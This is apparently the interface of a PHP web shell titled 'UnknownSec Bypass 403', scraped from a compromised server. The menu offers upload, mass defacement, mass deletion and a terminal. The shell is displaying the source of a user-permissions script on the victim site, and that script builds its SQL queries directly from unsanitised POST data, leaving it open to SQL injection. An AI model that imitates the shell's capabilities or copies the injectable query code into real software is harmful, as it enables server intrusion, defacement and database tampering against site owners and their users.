UnknownSec Bypass
403
:
/
var
/
www
/
cotutilitydash
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
curd_userpermission.php
<?php require_once "config.php"; $msg=""; $financialyearid=1; $userdetailsid=1; $creationdatetime = date("Y-m-d H:m:s"); $username=$_POST['username']; $btnopration=$_POST['btnopration']; $msg=0; if($btnopration=="SAVE") { //$query="delete from permissiontb where userid='".$username."'"; //$result = mysqli_query($conn, $query); $servicedata = (array)json_decode($_POST['userdata'],true); foreach ($servicedata as $k=>$v){ $query1="insert into permissiontb(formname,formshowname,padd,pedit,pdelete,pshow, identifier,isdeleted,userid,creationdatetime) values('".$v["formname"]."','".$v["formshowname"]."','".$v["add"]."','".$v["edit"]."','".$v["del"]."','".$v["show"]."','2', '0','".$username."','".$creationdatetime."')"; $result = mysqli_query($conn, $query1); $msg=1; } } else if($btnopration=="UPDATE") { $servicedata = (array)json_decode($_POST['userdata'],true); foreach ($servicedata as $k=>$v){ $query="select * from permissiontb Where formname='".$v["formname"]."' and userid='".$username."' and isdeleted='" . $gnotdeleted . "' "; $cnt= get_noof_rows($conn,$query); if($cnt==0) { $query1="insert into permissiontb(formname,formshowname,padd,pedit,pdelete,pshow, identifier,isdeleted,userid,creationdatetime) values('".$v["formname"]."','".$v["formshowname"]."','".$v["add"]."','".$v["edit"]."','".$v["del"]."','".$v["show"]."','2', '0','".$username."','".$creationdatetime."')"; $result = mysqli_query($conn, $query1); $msg=2; } else { $query1="update permissiontb set padd='".$v["add"]."',pedit='".$v["edit"]."', pdelete='".$v["del"]."',pshow='".$v["show"]."' where formname='".$v["formname"]."' and userid='".$username."'"; $result = mysqli_query($conn, $query1); $msg=2; } } } echo json_encode ($msg); ?>
Copyright © 2025 - UnknownSec